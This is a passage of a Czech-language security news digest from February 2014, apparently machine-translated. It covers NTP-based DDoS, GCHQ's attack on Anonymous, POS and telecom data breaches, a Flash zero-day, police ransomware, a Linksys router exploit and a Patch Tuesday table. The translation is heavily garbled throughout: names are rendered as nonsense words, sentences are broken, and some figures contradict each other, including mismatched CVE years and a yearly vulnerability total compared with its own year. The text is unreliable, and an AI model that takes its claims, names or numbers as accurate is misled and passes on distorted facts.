Navíc, protože odpovědi jsou legitimní data přicházející z platných serverů, je obzvláště obtížné blokovat Tyto typy útoků. " oběť je skutečně hit s velkým DDoS útoku . Správci serveru mohou buď zakázat "monlist" v rámci NTP serveru nebo upgrade na nejnovější verzi NTP (4.2.7), který dělá to samé. Pokud chcete vědět, zda váš server (y) jsou zranitelné, můžete použít tento jednoduchý on-line nástroj . Pro ​​více informací o tom, jak NTP-založené DDoS útoky funguje, podívejte se na Cloudflare v blogu od začátku tohoto roku.


GCHQ dávkovat Anonymous "IRC server
12.2.2014 Špionáž
Britská špionážní agentura GCHQ se používá Denial of Service útoků proti Anonymous, aby se narušit jejich komunikaci, jejich činnost, a vést členy volně svázané kolektiv od účasti na DDoS útoků zaměřených na vlády a společnosti, NBC hlášeny . informace o útoku jsou obsaženy v dokumentech exfiltrated NSA informátorů Edward Snowden a sdílet s novináři, v tomto případě prezentace PowerPoint od roku 2012 zaměřena na sdílení úspěch s NSA. Podle dokumentu, útok byl proveden jednotkou GCHQ názvem Joint Threat Research Intelligence Group (JTRIG), a byla zaměřena na IRC server, který hostil chatovací místnosti, kde Anonymní členové shromáždili a vyměňují informace. Podařilo se jim znemožňují přístup na asi 30 hodin. Prior k tomuto, členové JTRIG (pózuje jako ostatní členové Anonymous, samozřejmě) se zapojili do rozhovorů s některými z účastníků, jako je například nechvalně známý LulzSec mluvčí umělecké tvarování keřů a další hackeři, z nichž některé byly nakonec také zatčeni. Podařilo se jim využít informace shromážděné z těchto rozhovorů az zaminované webových stránek, na které lákal cíle, aby pro objevování skutečné-life identitu několika Anonymní členů, které se zabývají krádež dat . Navíc k tomu všemu, JTRIG montáž kampaň zprávy odeslané přes Facebook, Twitter, e-mail, IM a Skype odradit anonymní členům účastnit se útoků DDoS -., a byl zřejmě velmi úspěšný otázka tato odhalení otázka není, zda GCHQ má právo provést tento útok DoS. Agentura tvrdí, že provozovat v mezích zákona a s přísným dohledem, ale zastánci ochrany osobních údajů poukázal na to, že ne všechny Anonymní členové jsou zločinci, a že chatovací místnosti byly také použity k organizování protestů a kampaně, které nejsou ilegální. "Cílení Anonymní a hacktivists částky, které cílení občanům k vyjádření jejich politické přesvědčení, "říká Gabriella Coleman, profesor antropologie na McGill University." Někteří shromáždili kolem jména, které se zapojily do digitálního občanské neposlušnosti, ale nic, co vzdáleně připomínalo terorismu. Většina z těch, objetí Myšlenka především pro běžné politické vyjádření.


Bílé Ubytování potvrzuje porušení systém POS v 14 hotelů v USA
12.2.2014 Incidenty
Hotel management firmy White Ubytování potvrdila, že utrpěl porušení bodu prodejních systémů a vydala další informace o vyšetřování. "White Ubytování spravuje hotely na základě dohod s majiteli hotelu a je odlišný a samostatný subjekt od konkrétní značky ubytované, "oni byli jisti, počítejte s tím, a sdílené, že systémy v restaurací a salonků v 14 hotelů v USA, které byly ohroženy v období od března 20 a 16 prosince 2013. Celý seznam lze nahlížet tady , a je zajímavé poznamenat, že nejen Marriot hotely byly ovlivněny. "Hosté v hotelu, který neměl používat své kreditní karty v těchto prodejnách, a hosté, kteří si zakoupili pro své pokojové účtu na těchto prodejnách, nebyly ovlivněny," oni rozdělili, s výjimkou Radisson hvězda Plaza v Merrillville, Indiana , kde je systém správy majetku, který spravuje hotelové hosty "údaje o kreditní kartě se zdá také mohla být ohrožena. Informace ohrožena v rozporu je, že vázána na zákazníka platebních karet (jméno, číslo, bezpečnostní kód, datum vypršení platnosti), takže návštěvníci na těchto hotelů během výše uvedeného období jsou vyzýváni, kontrolovat jejich prohlášení karty, a bude přijímat jeden rok služby osobní ochrany identity zdarma. Firma slíbila, že další informace o incidentu ihned sdílet.


Cyber ​​rizika čekají na návštěvníky a diváky v Soči 2014 olympijských her
12.2.2014 KyberSecurity
Zimní olympijské hry 2014 jsou stanoveny začít v pátek v Soči, ruské město nacházející se na pobřeží Černého moře.

Tam bylo mnoho spory týkající se této volbě hostitelského města (a země), ale také, pokud jde o očekávané deka komunikační dohled - komunikace odposlech, kolekce metadata, atd. -., že Rusko se bude platit během hry US CERT byl zveřejněn na Úterý sada tipů jak pro diváky a cestující do Soči o rizicích spojených s kybernetickými by měly brát v úvahu. Zatímco hacktivist činnost není něco, co by se měly týkat se, vládní dohled je. "Rusko má národní systém zákonného odposlechu všechny elektronické komunikace. Systém operativních-vyšetřovacích opatření, nebo SORM, právně umožňuje ruská FSB sledovat, zachytit a blokovat veškerou komunikaci odeslána v elektronické podobě (tj. mobilní telefon nebo volání na pevné linky, internetového provozu, atd.), "vysvětlili. "Zprávy o Rostelecom, ruská národní telekomunikační operátor, instalace hloubkovou inspekci paketů (DPI) znamená, že úřady mohou snadno použít klíčová slova, vyhledávat a filtrovat komunikaci. Proto je důležité, aby účastníci pochopili komunikaci, zatímco na hry by neměly být považovány za soukromé." Oni také varoval před možností libovolného počítače nebo softwaru, který obsahuje citlivé nebo šifrovaných dat jsou zabavené ruskými orgány, které se odchylují od země. "Cestující může zvážit opuštění osobních elektronických zařízení (např. notebooky, smartphony, tablety), doma nebo alternativně přinést zapůjčení náhradního zařízení, která nejsou již ukládají citlivá data o nich, a může být vymazán po návratu do své domovské země. Pokud se jednotlivci rozhodnou přivést své osobní zařízení, zvážit všechny komunikace a soubory na nich být náchylné k odposlechu nebo propadnutí, "se ukázal ven. Dalším typem hrozby pochází z kybernetických podvodníků a podvodníky, kteří chtějí využít obrovského celosvětového zájmu v hrách. uživatelů internetu se doporučuje dávat pozor při prohlížení v přímém přenosu, opakování události, nebo kontrolní statistiky medaili on-line. "Události, které získají významný veřejný zájem a ve sdělovacích prostředcích se často používají jako návnady pro spam či spearphishing kampaní. Škodlivé aktéři mohou rovněž vytvářet falešné webové stránky a domény, které se zdají být oficiální olympijský novinky a zpravodajství, které mohou být použity k doručení škodlivého softwaru koncového uživatele při návštěvě webu , "oni si všimli. "Diváci by měli mít na pozoru před jakýkoliv jiný zdroj tvrdí, že poskytnutí přímé přenosy. Jako vždy, je nejlepší navštívit důvěryhodných zdrojů přímo, spíše než kliknete na e-mailem odkazy nebo otevírání příloh." Kromě toho, pokud hledáte koupit lístky, použijte nástroj Kontrola webových stránek (na konci této stránky ), aby zjistili, zda webové stránky, které plánujete koupit vstupenky ze je Authorised Ticket Reseller. NBC News má krátkou zprávu o nebezpečích návštěvníci čelí pomocí jejich zařízení Internet-umožnil, ale bohužel nejde příliš do detailů o tom, jak kompromisy se stalo. ale nebezpečí je reálné: z nezabezpečených veřejných WiFi sítí a nepoctivými přístupových místech; útoky Bluetooth, škodlivé nabíjecí stanice, až se zlými úmysly stažení maskuje jako aktualizace nebo záplaty a krádeži. Vlastně, to nejlepší, co dělat, pokud si nejste tech-důvtipný, je to, aby svůj vlastní telefon nebo notebook s vámi vůbec, nebo přinést to, ale před návštěvou vyčistěte důkladně každého kusu citlivých informací . Vypnout Wi-Fi, Bluetooth a NFC na zařízení, se nelze přihlásit do citlivých účtů, když jste tam, nepřijímáme nevyžádané stahování, a ne (pokud to může pomoci) používat třetí stranou nabíjení nebo skladovací služby.


Google ups odměny pro software třetích stran náplastí
12.2.2014 Zranitelnosti | Bezpečnost
Google se neustále vylepšování své chyby odměnu a oprava věrnostní program , a poslední změna spočívá dalšího rozšíření působnosti a odměn částka zvyšuje. "Ode dneška budeme rozšiřovat rozsah našeho zranitelnost věrnostní program také zahrnuje všechny aplikace Chrome a rozšíření vyvinuté a označen jako "Google" , oznámil Eduardo Vela Nava a Michal Zalewski z týmu Google Security Team. "Myslíme si, že rozvoj Chrome rozšíření bezpečně je poměrně snadné (vzhledem naše zásady bezpečnosti jsou dodržovány), ale vzhledem k tomu, že rozšíření, jako jsou setkání a GMail jsou široce použít, chceme, aby se ujistil úsilí, aby jejich bezpečné odpovídajícím způsobem odměněn. " Odměny zůstávají stejné -. mezi $ 500 až $ 10.000 zranitelnosti v závislosti na závažnosti jeho vlivu Je to v poslední době představil experimentální oprava odměn programu pro podporu výzkumných pracovníků, vytvořit bezpečnostní opravy pro software třetích stran, který odměny byly zvýšeném. Zpočátku, po jejich podání byl přijat a zahrnut do konečného kódu softwaru, Google bude odměňovat výzkumníky s částkou mezi $ 500 až $ 3,133.7. Nyní, rozsah je vyhrazeno pro podání nabídek, že "jsou velmi jednoduché, nebo které nabízejí jen velmi spekulativní zisky," zatímco 5000 dolar bude rozdávat za "středně složité opravy, které poskytují přesvědčivé bezpečnostní výhody," a 10.000 dolary za "složité, zlepšení vysokým dopadem, který téměř jistě brání slabiny v postiženém kódu.


Adobe Flash chyba využívány v přírodě, nyní aktualizovat
12.2.2014 Zranitelnosti
Adobe vydala nouzovou opravu pro kritickou zranitelnost postihuje Flash Player pro Windows, Linux a OS X, využívání, které může mít za následek útočník získává dálkové ovládání systémů obětí.

Podle Adobe bezpečnostní poradenství , chyba je aktivně využíván ve volné přírodě, ale na rozdíl od připsání svůj objev vědců Alexander Polyakov a Anton Ivanov společnosti Kaspersky Lab, se žádné podrobnosti o probíhajícím útoku byly sdíleny. příspěvek zveřejněný v pondělí na Kaspersky Lab Securelist blog ukazuje, že jejich vědci odhalili nový sofistikovaný cyberespionage operaci, která, mimo jiné, byl schopen ohrozit Mac a počítače se systémem Linux. Zdá se pravděpodobné, že chyba Flash je mezi těmi zadlužuje útočníky, ale vyhráli jsme "Nevím jistě, dokud další podrobnosti o této operaci jsou sdíleny příští týden. , ale neměli byste čekat realizovat opravu. Pokud používáte Adobe Flash Player 12.0.0.43 a starší verze pro Windows a Macintosh nebo Adobe Flash Player 11.2.202.335 a starších verzích pro Linux, navštivte Adobe Flash Player Download Center a vyberte ji. Pokud používáte Flash vložený v Chrome, nebo Internet Explorer , aktualizujte svůj prohlížeč na nejnovější, non-zranitelných verzí. UPDATE: výzkumníci společnosti Kaspersky Lab vydala další technické podrobnosti .


Policie ransomware: mnohamilionové podnikání
12.2.2014 Viry
Evropské centrum pro boj proti kyberkriminalitě Europolu zveřejnila své posouzení hrozeb na policejní Ransomware - třídu počítače malware, který viděl exponenciální růst v Evropské unii v posledních dvou letech.

Výsledkem společné iniciativy mezi Evropskou kyberkriminalitě centra (EC3) a nizozemského národního High Tech Crime Unit (NHTCU) se tato zpráva si klade za cíl zvýšit povědomí o ransomware, a také identifikovat příležitosti pro mezinárodní intervence donucovacích orgánů a operativní koordinace. Policie Ransomware je druh online podvody používají zločinci vydírat peníze prostřednictvím nasazení malware. Malware zakáže funkčnost počítačů obětí a zobrazí se zpráva požadující zaplacení výkupného získat přístup ke svým strojům. se Ransomware zprávy za cíl, aby se z donucovacích orgánů, a obviňují oběť provádět on-line činnosti, jako je nelegální soubor sdílení, přístupu k materiálu, zneužívání dětí, nebo navštívit teroristické webové stránky. Zločinci používají skutečné vymáhání práva agentura loga půjčovat autoritu svých zpráv a nutit oběti na zaplacení výkupného, ​​aby odhalili jejich počítačů. Ačkoliv přesný počet obětí policejní ransomware v EU je obtížné posoudit, odhaduje se, že miliony počítačů mají byl napaden a desítky tisíc občanů zaplatil požadavky výkupného. Je milióny euro obchod pro zločince podílejí. Tyto cybercriminal činnosti jsou usnadněny podzemními on-line fóra, které poskytují Ransomware zdrojového kódu, infrastrukturu pro distribuci malwaru a praní špinavých peněz služeb "proplacení z" nedovoleného výnosy získané prostřednictvím on-line předplacené řešení a virtuální měny. . Ransomware "kity" znamená, že útoky mohou být snadno nasazeny a již nejsou omezeny na technicky zdatné Nové formy ransomware se objevují - například Cryptolocker - což může mít ještě větší dopad na jednotlivce a podniky, protože riskují trvalou ztrátu jejich dat a soubory. Počítačoví zločinci se bude rozšiřovat síť obětí zaměřují se na nové trhy, zaměřující se na různé operační systémy a zařízení. distribuce Ransomware herců a infrastruktury v celé řadě právních řízeních komplikuje policejní vyšetřování, a tudíž zlepšení spolupráce a výměna informací mezi donucovacími orgány a soukromými partnery je nezbytné . boj proti počítačové trestné činnosti tohoto jevu Troels Oerting, ředitel Evropského centra pro boj proti kyberkriminalitě řekl: "Malware útoky v podobě ransomware se bohužel zvýší. Je to "dojná kráva" pro trestní podniků, snadné použití a obtížné pro oběti na ochranu proti. Všechny druhy nevinných uživatelů jsou potenciální oběti tohoto trestného činu - a to nejen tradiční uživatelé, ale také podniky a veřejné služby. EC3 bude i nadále pomáhat členským státům EU donucovacím orgánům v boji proti této trestné činnosti a sledování se výnosů z trestné činnosti. Mezitím jsme se všichni musíme zvýšit povědomí mezi všemi uživateli internetu, aby se zabránilo dalšímu dopadu. Je třeba dodržovat několik pravidel - jeden je zajistit, aby jste vždy zálohovaná ".


Nedostatek dovedností, které brání AppSec programy
12.2.2014 Bezpečnost
Pokračující nedostatek dovedností v oblasti zabezpečení aplikací je silně brzdí provádění účinných AppSec programů, podle SANS.

Aplikace Bezpečnostní programy a postupy průzkum 2014 dotazovány 488 IT a bezpečnostních profesionálů o současném a budoucím stavu zabezpečení aplikací v jejich organizacích. "Jedna věc, která stojí v letošním roce je nárůst počtu organizací s formálním zabezpečení aplikace programu v místě . Přibližně 83% respondentů (oproti 66%) mají program AppSec na místě, a více než 37% (oproti 33%) mají program, který působí již více než pět let, "říká SANS analytik Frank Kim. "To znamená, že hodně pokročili, ale také zdůrazňuje, že je potřeba dělat mnohem více." V průzkumu, více než 35% respondentů testování bezpečnosti svých kritických podnikových aplikací průběžně, a to až z 23% v loňském průzkumu. A, povzbudivě, pouze malé procento (méně než 3%) respondentů odešel zabezpečení aplikací náhodě a netestovali vůbec. Průzkum zjistil, že nedostatek kvalifikovaných pracovníků a nedostatečnou kvalifikací jsou považovány za hlavní inhibitory zahájení AppSec programy. "Letošní průzkum přináší cenné a překvapivé pohledy na problémy, které organizace čelí dnes při provádění úspěšné AppSec programu," říká SANS analytik Jim Bird. "Je to nejen finanční prostředky, a dostat management buy-in there-are další, zásadní problémy, včetně nedostatku dovedností, které brání lidem z péče o bezpečnost, kde se dělá nejvíce rozdíl, předem v návrhu a vývoje.


DDoS útoky používané k ovlivnění cen akcií
12.2.2014 Počítačový útok
Prolexic Technologies sdílí analýzu téměř tuctu globálních útoků DDoS , které označuje počítačoví útočníci se pomocí DDoS útoků ve snaze ovlivnit tržní hodnoty a zasahovat do výměny platformy.

"Typicky, DDoS útoky jsou zahájeny na pohonné hmoty veřejnou diskusi, nebo po pomstě, vydírání a vydírání - ale to se mění,". Řekl Stuart Scholly, prezident Prolexic "Během několika posledních let zejména DDoS útok kampaně představuje významný hrozbu pro odvětví finančních služeb, jakož i jiných veřejně obchodovaných firem a obchodních platforem. Jako součást našich DDoS útok forenzní, jsme odhalili znepokojivý trend: Mnoho z těchto zákeřných útoků se jeví záměr na snížení u cíle cenu akcií nebo měn, nebo dokonce dočasně zabránit obchodů od odehrává, "dodal Scholly. veřejný obraz globální obchodní nebo finanční služby, je úzce spojena s jeho kybernetickém přítomností. Užívání veřejně obchodované firmy nebo platforma pro výměnu v režimu offline - a šíří zvěsti, že vyvolávají otázky o jeho schopnosti podnikat on-line - může vytvářet falešné nebo zavádějící vystoupení. To je znakem manipulace s trhem. "Několik specifických Cyber-teroristické skupiny jsou zodpovědné za většinu z těchto útoků. Zatím nebyli úspěšní v přinášení se celý velký trh, "vysvětlil Scholly. "Ale DDoS útoky, aby stále větší, silnější, delší a složitější, takže nemůžeme usnout na vavřínech. A co víc, je riziko přesahuje skutečnou výpadku - sociální média tlachání a mediální pokrytí může zesílit vnímaný efekt, narušení a poškození způsobené kybernetický útok kampani ".


Většina dospělých sdílet intimní informace prostřednictvím nezabezpečených digitálních zařízení
12.2.2014 Bezpečnost
McAfee zkoumala, jak více než 1500 spotřebitelů jsou sdílení a ukládání intimních dat na svých mobilních zařízeních, a to zejména se současnými nebo bývalými významných druhých. Sdílení osobní obsah jako jsou sugestivní texty, nahé fotky, sugestivní video a hesel na těchto zařízení může potenciálně vést k cyber-stalking a expozice soukromého obsahu úniku on-line. Zatímco 98% respondentů využívá jejich mobilní zařízení fotit, 54% send nebo přijímat intimní obsahu, včetně videa, fotografií, e-mailů a zpráv. Z dotázaných, 69% je zajištění jejich smartphone s heslem nebo heslem, zvýšení 30 procentních bodů z loňského výsledku. Nicméně, 46% dospělých v USA stále sdílejí svá hesla s jinou osobou (pokles z 54%), zatímco 42% používat stejné heslo na více zařízeních, čímž se zvyšuje pravděpodobnost, že tato mobilní zařízení se stane pirát. "Se všemi příběhů" jsem slyšel o intimní fotky jsou unikla, to je těžké uvěřit, že lidé jsou stále sdílí svá hesla, "řekl Gary Davis, viceprezident společnosti McAfee spotřebitele podnikání. "Nakonec, oni jsou rostoucí rizika z těchto fotografií se stal veřejným a možná ohrožení jejich identity a pověsti. Spotřebitelé musí přijmout opatření a používat mobilní bezpečnosti, aby zajistily, že to, co by mělo být soukromé pobyty soukromé. " McAfee radí spotřebitelům, aby sdílení hesel nebo kódů pro mobilní zařízení s ostatními, které pomohou udržet svůj obsah v bezpečí. Mobilní uživatelé by se měli vyhnout používání slabá hesla, které lze snadno určit, jako jsou narozeniny, čísla v řádku nebo opakujících se čísel pro jejich zařízení. Spíše šestimístná hesel a slov převést na čísla pomocí mobilního klávesnice jsou silnější a je třeba využít. jen pro vaše oči Sedmdesát procent z 18 - 24 letých receive se sexuálním podtextem obsahu od někoho, největší procento všech věkových skupin. Další lidé jsou pravděpodobně používat své mobilní zařízení k odesílání a přijímání podobný obsah (61% mužů vs 48% žen). Čtyřicet pět procent dospělých v USA tvrdí, že uložené intimní obsah, který jste obdrželi ve srovnání s 40% těch, kteří ukládat nemorální fotky, videa nebo zprávy, které jste odeslali. Z těch, kteří poslali intimní nebo pikantní obsah, 77% z nich poslali tento obsah na jejich významný jiný, zatímco u 1 z 10 jedinců jste odeslali uživateli podobný obsah na úplně cizí. mezeru Ochrana osobních rovnosti Podle průzkumu, více mužů než žen chránit své mobilní zařízení (74% mužů vs 65% žen). Vzhledem k tomu, že snaha chránit své mobilní zařízení a jeho obsah více než dvě třetiny lidí zájem o koupi biometrické zabezpečení, vestavěné funkce (např. rozpoznávání obličejů, rozpoznávání hlasu, rozpoznávání otisků prstů, atd.) případ ex Zatímco 96% z USA dospělí dotazovaní důvěřovat své významné druhé s intimním obsahem nebo jinak soukromé informace, které jste poslal, pouze 32% se zeptal svého partnera odstranit informace při ukončení vztahu. Kromě sdílení hesel, 50% podíl na obsah mobilní telefon a 48% podíl e-mailových účtů. Přesto, čtvrtina respondentů vzali mobilní zařízení svého partnera vidět další obsah uložený na něm, včetně zpráv a fotografií. Jeden z pěti lidí, je pravděpodobné, že k přihlášení do Facebooku v úvahu jejich významný jiný je alespoň jednou za měsíc, a jen 30% dotázaných připustila, aby sledoval jejich významný jiný ex na sociální média, s 18 až 24 roky a starší koně je horní věková skupina. Veřejné vystavení on-line náklonnosti S 91% respondentů na sociální mediální platformu (např. Facebook, Twitter, Instagram), z těch, kteří odpověděli, že budou slavit Valentýna na sociální média, 76% respondentů plánuje posílat zprávy ostatním při 58 % zaúčtuje fotografií. Z těch, kteří odpověděli, více žen než mužů, v plánu oslavit svou lásku na sociální média na Valentýna (80% žen vs 72% mužů).


Podezření Mass Exploit Against Linksys E1000 / E1200 routery
12.2.2014 Počítačový útok

Brett, který provozuje ISP ve Wyomingu, oznámila nám, že měl počet zákazníků s compromissed Linksys routery těchto posledních dnech. Směrovače, jakmile compromissed, skenování portů 80 a 8080 tak rychle, jak oni mohou (nasycení šířku pásma k dispozici).

Není jasné, které zranitelnost je využívána, ale Brett odstraněny slabá hesla. E1200 routery s nejnovější firmware (2.0.06) se zdají být imunní proti působení exploit používané. E1000 routery jsou na konci životnosti, a nezdá se, že se imunitní firmware k dispozici.

Jako ukazatelů, podívejte se na E1000/1200 routery, které skenovat IP adresy postupně na portu 80/8080. Některé routery mohou být změněna nastavení DNS poukázat na DNS serveru Google (8.8.8.8 nebo 8.8.4.4).

Pokud máte nějaké poznatky, dejte nám prosím vědět.


02. 2014 Microsoft Patch Tuesday
11.2.2014 Zranitelnosti

Přehled 02. 2014 Microsoft záplaty a jejich stav.

# Ovlivněno Kontraindikace - KB Známé Využije Hodnocení Microsoft (**) ISC hodnocení (*)
klienti servery
MS14-005 Přístup k informacím Chyba zabezpečení ve službě Microsoft XML kód Services
(Nahrazuje MS10-051 )
Microsoft XML Core Services CVE-2014-0266
KB 2916036 Ano. Závažnost: Důležité
zneužitelnosti: 3 Důležitý Důležitý
MS14-006 IPv6 Denial of Service
(nahrazuje MS13-065 )
TCP / IP Stack (IPv6) CVE-2014-0254
KB 2904659 Ano. (Vuln. známo) Závažnost: Důležité
zneužitelnosti: 3 Důležitý Důležitý
MS14-007 Vzdálené spuštění kódu v Direct2D
(Nahrazuje)
Direct2D CVE-2014 až 0263
KB 2912390 Ne. Závažnost: Kritická
zneužitelnosti: 1 Kritický Důležitý
MS14-008 Umožnit vzdálené spuštění kódu v aplikaci Microsoft Forefront
(nahrazuje)
Microsoft Forefront CVE-2014-0294
KB 2927022 Ne. Závažnost: Kritická
zneužitelnosti: 1 N / A Kritický
MS14-009 Zvýšení úrovně oprávnění chyby zabezpečení v rozhraní. NET Framework
(Nahrazuje MS13-052 , MS11-100 )
. Net Framework CVE-2014-0253 CVE-2014-0257 CVE-2014-0295

KB 2916607 Ano. Závažnost: Důležité
zneužitelnosti: 1 Důležitý Důležitý
MS14-010 Kumulativní aktualizace zabezpečení pro aplikaci Internet Explorer
(nahrazuje MS13-097 )
Internet Explorer CVE-2014-0267 CVE-2013-0268 CVE-2013-0269 CVE-2013-0270 CVE-2013-0271 CVE-2013-0272 CVE-2013-0273 CVE-2013-0273 CVE-2013-0274 CVE-2013-0275 CVE-2013-0276 CVE-2013-0277 CVE-2013-0278 CVE-2013-0279 CVE-2013-0280 CVE-2013-0281 CVE-2013-0283 CVE-2013-0284 CVE-2013-0285 CVE-2013-0286 CVE-2013-0287 CVE-2013-0288 CVE-2013-0289 CVE-2013-0290 CVE-2013-0293

KB 2909921 Ano
(CVE-2014-0267) Závažnost: Kritická
zneužitelnosti: 1 Patch TEĎ! Důležitý
MS14-011 Vzdálené spuštění kódu v jazyce VBScript skriptování
(nahrazuje MS10-022 )
VBScript CVE-2014-0271
KB 2928390 Ne. Závažnost: Kritická
zneužitelnosti: 1 Kritický Kritický


Windows, IE, Java jsou nejzranitelnější
11.2.2014 Zranitelnosti
Při srovnání s čísly z předchozího roku 2013 došlo k nárůstu v zjištěnými chybami zabezpečení, a co víc, řada kritických zranitelností se také zvýšil -. Když je to podstatně menší než v roce 2009 researchers GFI have pročesána podrobnosti poskytovaných Vulnerability Database US National (NVD), a zjistili, že v roce 2013, v průměru 13 nových zranitelností byly hlášeny každý den, přinášet úhrn k 4794 -. 447 více než v roce 2013, 50 procent z chyb bylo nalezeno v produktech pouze 10 dodavatelů z 760:

Čísla jsou tak dokladem toho, že množství různých nabídek tyto velké firmy mají a na jejich popularitě, které se přirozeně ukazuje na to, že jsou častěji terčem hackerů a analyzovány výzkumníky bezpečnosti pro bezpečnostní nedostatky. Oracle je na špičce seznamu není jen proto, že Java zranitelnosti, ale také z důvodu hardwarových chyb nalezených v podnikových zařízeních. Přesto, že Microsoft nemůže povzdech povzdech ot úlevu, protože společnost měla obrovský nárůst "vysoce rizikových" zranitelností ve srovnání s 2012 čísly. Kritické zranitelnosti nalezené v jeho různých operačních systémů z Microsoft obsadit 8 prvních 9 míst na seznam většiny cílových operačních systémů v roce 2013:

A konečně, Microsoft Internet Explorer, Oracle Java a Google Chrome skončil obsazení prvních tří míst (v tomto pořadí) na seznamu nejvíce cílených aplikací. "Z bezpečnostního hlediska, Oracle a Java měla špatný rok, v roce 2013 se 193 chyb než pro Java, 102 z nich kritické, " poznamenal GFI křesťanskou Florian. "Aby toho nebylo málo, vysoký počet kritických zranitelností v Javě byly nulové dny nedostatky." Další věc, vzít v úvahu, je skutečnost, že počítačoví útočníci mají přednost využívání Java zranitelnosti, protože software lze nalézt na mnoha počítačů, kteří provozují různé operační systémy. zachování všech na tuto skutečnost, nejlepší rada, se můžete dostat k bezpečnému uchování je i nadále udržet váš operační systém, aplikace a bezpečnostní software aktuální, a odebrat software který nepoužíváte, nebo je potřeba tak, aby se minimalizovalo útoku.


Cílová obhajuje čipové karty v důsledku porušení
11.2.2014 Bezpečnost | Kriminalita
Nedávná lavina porušení, která vyústila v řádu desítek milionů platebních karet je ohrožena již potřásl jak maloobchodní trh v USA a zákazníky. Přes následné zjištění, že Neiman Marcus , Michaels Stores a další prodejci byli zasaženi stejným způsobem (s POS paměti -škrábání malware ), množství informací o kreditní kartě ukradený v cílové porušení dělal to ten, který zachytil pozornost amerických nakupujících nejvíce. A někteří z nich ztratili důvěru ve schopnosti maloobchodníků k ochraně svých dat a se vrátil platit v hotovosti, ostatní jsou stále chválit pohodlí platebních karet. ale pro Target, prodejce dobře-známý pro svou rozsáhlou zákaznickou sběru dat a data mining, na skutečnost, že její zákazníci mohli vybrat, aby zanechat stopu svých nákupních zvyklostí je něco, ale dobrou zprávou. Přidejte k tomu skutečnost, že společnost je již při pohledu na dvou žalob a soudních procesů podaných proti nim v důsledku porušení, a že slyšení o něm byly naplánovány s senátní bankovní podvýboru, a není divu, že společnost byla nucena do full-na režimu kontroly poškození. John Mulligan, Target Chief Financial Officer, napsal svůj názor, kus pro The Hill vyzývající ke změně: nadešel čas pro americké platebních karet společností a podniků k přechodu na čipu s podporou čipové karty. On je jen částečně pravdu. Doba těchto čipových karet bylo dávno, pouze náklady na celostátní zavedení byl vyšší než z různých důsledků tohoto typu porušení. "Na cíl, jsme pracovali několik let na cestě k přijetí této technologie . Vzhledem k porušení, jsme urychluje vlastní 100.000.000 dolarů investic dát čip s podporou technologie na místě, "Mulligan sdílený s tím, že jejich cílem je implementovat tuto technologii ve svých obchodech a na svých vlastnických REDcards počátkem roku 2015. Má to opravdu trvat tak dlouho, implementovat technologii, která se ukázala být bezpečnější a byl široce používán v EU, Velké Británii a Kanadě let? Zdá se, že ano. "Důvodem Spojené státy pomalu přijmout změnu je, že všichni hráči v systému plateb - obchodníci, emitenti, banky a sítě - nebyli schopni najít společnou řeč o tom, jak se podělit o náklady na realizaci , "říká. Předpokládám, že to není jen důvod, ale důvod. "Asi před 10 lety, Target pilotoval časnou generaci technologie čipu povoleno na cílové VISA REDcard, se smíšenými výsledky. Pozoruhodně, že karty byly mnohem dražší Vyrábíme a vyžaduje výměnu ukládání cardreadery, "sdílené Mulligan. "Také technologie v té době by byly pouze použitelné v našich prodejnách, takže pro matoucí zážitek pro zákazníky, celkově. Po třech letech na vlastní pěst, jsme přerušit program." Má pravdu v tom, že změna musí se stalo, a že všichni hráči musí zapojit. Otázkou je, zda se náklady na změny stávají méně než náklady (finanční, pověsti) z porušení pro každého? Pochybuji o tom. InfoWorldu Paul Venezia je dobrý nápad: rozdělovat velké pokuty pro velké porušení. "V každém případě, maloobchodníci vyjádřit svůj zármutek a soucit, a slibují, že ne aby se to stalo znovu, ale to se nestane,". poukazuje. "Target bude mít nějaký negativní publicitu pro chvíli, ztratit některé prodeje, a vrátit se do práce jako obvykle. "JP Morgan odhaduje, že Target porušení by mohlo vzniknout škody ve výši až 18 miliard dolarů, což" poznamenal. "Pokud společnost měla . náhradu ve výši 18 miliard dolarů škody, dobře, že by mohla učinit prohlášení " On také předložit jinou alternativu: vykonatelný opt-out volbu pro zákazníky, kteří nechtějí, aby se jejich osobní, finanční a transakční informace shromážděné kdokoli první místo. Bohužel, nevidím to děje, v blízké nebo vzdálené budoucnosti.


Osobní info 800000 Orange zákazníků ohrožena
11.2.2014 Kriminalita
Globální telekomunikační gigant Orange vyslal upozornění na téměř 800,000 (asi 3 procenta) na svých francouzských zákazníků, varuje, že jejich osobní údaje byly ohroženy v porušení, která se konala 16. ledna.

Ukradl data zahrnují zákazníků jméno, poštovní adresu, e-mailovou adresu, telefonní číslo a další informace o složení domácnosti, počtu upsání členů domácnosti mají s Orange nebo konkurenty, a zákazníků preference o tom, jak být kontaktován . narušení byla ukončena bezprostředně po odhalení, a ohrožena webové stránky - "Můj účet" v klientské oblasti Orange.fr stránek -. offline na chvíli firma říká, že hesla nebyla ohrožena, ale varuje Uživatelé, že informace, které byly ukradeny je velmi užitečné pro montáž na phishingové útoky. Vysvětlili, proč phishing útok, a vyzval dotčené zákazníky, aby se na pozoru, že se blíží prostřednictvím e-mailu, SMS nebo telefonicky. PC INpact (via Google Translate) uvádí, že všichni francouzští zákazníci a ne jen ty, jichž se týká porušení již obdržel varování phishing kolem January 23, ale že jeden nezmínil o vniknutí. Úřady mu bylo oznámeno porušení a vyšetřuje ji, ale žádné další podrobnosti o tom, jak to bylo provedeno byly sdíleny.


Hackeři žalovat německou vládu o pomoc NSA špehovat své občany
11.2.2014 Špionáž
Chaos Computer Club (CCC), největší asociace hacker Evropy, a Mezinárodní liga pro lidská práva (ILMR) žalují německou vládu za údajné pomoci zahraničních zpravodajských agentur tajně sledovat německé občany. "Po měsících tiskových zpráv o hromadný dozor ze strany tajné služby a urážlivé útoky na systémy informačních technologií, máme jistotu, že tajné služby Německa a dalších zemí porušil německý trestní zákon, "řekli ve veřejném prohlášení . "S tímto trestní oznámení, doufáme, že se konečně zahájit vyšetřování prováděném Spolkový generální prokurátor proti německé vládě. CCC se naučil s jistotou, že vedoucí představitelé tajných služeb a federální vlády pomáhali a naváděl páchání těchto trestných činů. " stížnost podána u úřadu spolkového generálního prokurátora tvrdí, že federální vláda, předsedové německých tajných služeb, německými vyzvědači a jejich orgány dohledu, německý ministr vnitra, stejně jako německá Chancelor Angela Merkelová buď se zúčastnil nebo pomáhal "nelegální a zakázané tajné zpravodajské činnosti", které porušily právo na soukromí německých občanů . "Je politováníhodné, že odpovědné osoby a okolnosti jejich zločiny nebyly zkoumány," říká Dr. Julius Mittenzwei, právník a člen CCC. skupina se rovněž žádá, aby Edward Snowden být volán jako 